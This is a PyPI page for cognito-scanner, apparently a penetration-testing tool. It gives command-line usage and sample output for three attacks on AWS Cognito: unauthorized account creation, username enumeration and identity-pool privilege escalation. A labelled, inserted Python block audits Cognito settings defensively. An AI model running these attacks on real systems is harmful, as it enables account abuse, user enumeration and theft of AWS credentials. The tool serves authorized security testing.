Cognito Scanner

A simple script which implements different Cognito attacks such as Account Oracle or Privilege Escalation

If you are not comfortable with Cognito and want to understand the attacks better, you can check this article!

Purpose of this repository

Cognito is an AWS service which provides secure and scalable user authentication and access control for web and mobile applications.

This repository contains a script which implements three different attacks on Cognito:

  1. Unwanted account creation
    • What is it? It is a malicious attempt to create user accounts without proper authorization or authentication, often leading to an influx of unauthorized accounts within a system.
    • Parameters needed from AWS? Only the Client ID protected by the Cognito instance.
  2. Account Oracle
    • What is it? It is a type of attack where an attacker exploits an external information source (known as "oracle"), to get information about a service or to gain unauthorized access.
    • Parameters needed from AWS? Only the Client ID protected by the Cognito instance.
  3. Identity pool escalation
    • What is it? It refers to the process where authenticated users obtain temporary credentials with higher privileges through an identity pool, allowing them to access more AWS resources than originally intended.
    • Parameters needed from AWS? The Client ID, the Pool ID and the Identity Pool ID.
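A defensive counterpart to the three attacks above, as an added example that is not part of cognito-scanner: it audits already-fetched configuration for the setting tied to each attack. The input dictionaries follow the shape of the boto3 `describe_user_pool` and `describe_user_pool_client` responses and of an IAM policy document; the function names, finding labels and sample data are constructed for illustration.

```python
# Added example: offline audit of Cognito configuration, no AWS calls are made.

def wildcard_statements(policy):
    """Return Allow statements granting a wildcard action on every resource."""
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):  # IAM accepts a single statement object
        stmts = [stmts]
    risky = []
    for s in stmts:
        actions = s.get("Action", [])
        resources = s.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        if (s.get("Effect") == "Allow" and "*" in resources
                and any(a == "*" or a.endswith(":*") for a in actions)):
            risky.append(s)
    return risky


def audit_cognito(user_pool, app_client, auth_role_policy):
    """Map each attack class to the configuration that leaves it open."""
    findings = []
    # Unwanted account creation: self sign-up is open unless only admins
    # may create users (AllowAdminCreateUserOnly defaults to False).
    admin_cfg = user_pool.get("AdminCreateUserConfig", {})
    if not admin_cfg.get("AllowAdminCreateUserOnly", False):
        findings.append("self-signup-enabled")
    # Account oracle: ENABLED makes authentication and password-recovery
    # errors generic; a missing value is treated conservatively as exposed.
    if app_client.get("PreventUserExistenceErrors") != "ENABLED":
        findings.append("user-existence-errors-exposed")
    # Identity pool escalation: the role handed to authenticated identities
    # should not carry service-wide or global wildcards.
    if wildcard_statements(auth_role_policy):
        findings.append("identity-pool-role-too-broad")
    return findings


# Constructed sample data (not taken from a real account).
WEAK_POOL = {"AdminCreateUserConfig": {"AllowAdminCreateUserOnly": False}}
WEAK_CLIENT = {"PreventUserExistenceErrors": "LEGACY"}
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}
HARD_POOL = {"AdminCreateUserConfig": {"AllowAdminCreateUserOnly": True}}
HARD_CLIENT = {"PreventUserExistenceErrors": "ENABLED"}
HARD_POLICY = {"Version": "2012-10-17", "Statement": {
    "Effect": "Allow", "Action": ["s3:GetObject"],
    "Resource": "arn:aws:s3:::example-bucket/*"}}
```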

Data retrieval

To execute the attacks you will need to pass some arguments. Some of them come from AWS resources.

What are these parameters?

  • Pool ID (or User Pool ID): unique identifier assigned to a specific user pool, which is used by applications to interact with that user pool and perform authentication and user management operations.
  • Client ID: unique identifier assigned to each application or client that integrates with a user pool, serving to authenticate and authorize requests from trusted sources during the authentication flow.
  • Identity Pool ID: unique identifier for an identity pool, which allows authenticated users to obtain temporary AWS role and credentials for accessing authorized resources.

How do we get them?

You can get these parameters in multiple ways, but you have to find them yourself because it depends on the authentication implementation. If you use an HTTP proxy such as Burp, you should be able to easily find these parameters:

  • HTTP parameters: sometimes they are in the parameters of the request.
  • JavaScript files: they can also be obfuscated in the JavaScript code and be retrieved after deobfuscation.
  • HTTP headers: these parameters can also appear in the headers of the requests.
  • Other files: they can be stored in appendix files such as JSON files or CSV files.

Now that we have all the resources needed, we can start the installation process.

Requirements

You can easily check that all requirements are met with the commands below:

$ python3 --version
$ pip --version
$ git --version

Installation

Using pip

$ pip install cognito-scanner

Manually

  1. Clone repository
# Using HTTPS
$ git clone https://github.com/padok-team/cognito-scanner.git
# Using SSH
$ git clone git@github.com:padok-team/cognito-scanner.git
$ cd cognito-scanner/
  2. Create the Python package
# In the root directory of your package, run the following command to build the distribution files
$ python3 setup.py sdist bdist_wheel
# Leave the directory
$ cd
# Install your package using pip
$ pip install path/to/cognito-scanner/dist/cognito-scanner-x.x.x.tar.gz
  3. You can now try to run the tool using cognito-scanner --help

Usage

You can get details of how to use the script:

$ cognito-scanner --help
# Get information about how to use the unwanted account creation script
$ cognito-scanner account-creation --help

Example

The values here are entirely fake.

Unwanted account creation

$ cognito-scanner account-creation --region=eu-west-3 --user_attributes=mymail@mail.com --client_id=pucXBthcyRvzwqj0WXG28DQeav --username='cognito_user' --password='R4nd0mP4$$word'
# Output
{
	UserConfirmed: False
	UserSub: 2199983e-3555-73bj-12ep-7aff05kc6kd8
}

Account Oracle

$ cognito-scanner account-oracle --client_id=pucXBthcyRvzwqj0WXG28DQeav --region=eu-west-3 --file=usernames.txt
# Output
Users found available in the file ./existing_users.txt

Identity pool escalation

$ cognito-scanner --region=eu-west-3 --pool_id=eu-west-3_liyFAGBUV --client_id=pucXBthcyRvzwqj0WXG28DQeav --identity_pool_id=eu-west-3:52983214-5fd7-438e-9088-b2e839ceefa0 --username=pentest --password='aR4ndomPassw0rd$'
# Output
[hacker]
output = json
aws_access_key_id = ROWIKQXNMUAU76LTQJEB
aws_secret_access_key = wympLAO6i9zn9GPo51hGxGRA8rsIWb8l5zzMa2iD
aws_session_token = ...

Questions?

Open an issue to contact us or to give us suggestions. We are open to collaboration!

License

Download files

Source Distribution

cognito-scanner-1.0.2.tar.gz (14.1 kB view details)

Uploaded Source

Built Distribution

cognito_scanner-1.0.2-py3-none-any.whl (15.0 kB view details)

Uploaded Python 3

File details

Details for the file cognito-scanner-1.0.2.tar.gz.

File metadata

  • Download URL: cognito-scanner-1.0.2.tar.gz
  • Upload date:
  • Size: 14.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.2

File hashes

Hashes for cognito-scanner-1.0.2.tar.gz
Algorithm Hash digest
SHA256 0877d7ed4a4ea583b271c37660901f81a751bd1254dd5879c40f8456e226ec69
MD5 f6cf1c02d3627e605185fac72e229423
BLAKE2b-256 5bf63570a66846b60bc8fd3590e14ea7f1fe1f639dc0d4c6f2ae73f3372a0fcd

File details

Details for the file cognito_scanner-1.0.2-py3-none-any.whl.

File hashes

Hashes for cognito_scanner-1.0.2-py3-none-any.whl
Algorithm Hash digest
SHA256 8c35b697d163c108f2d8f760de5bd83b183cde0f55615810047a645e718d686f
MD5 89f801e0f972deeffe73a1503efcc3ae
BLAKE2b-256 19c0fb09eb5ed1b7074e81216d92621daae07d5bd83d859ef46ae75482fbe4ba
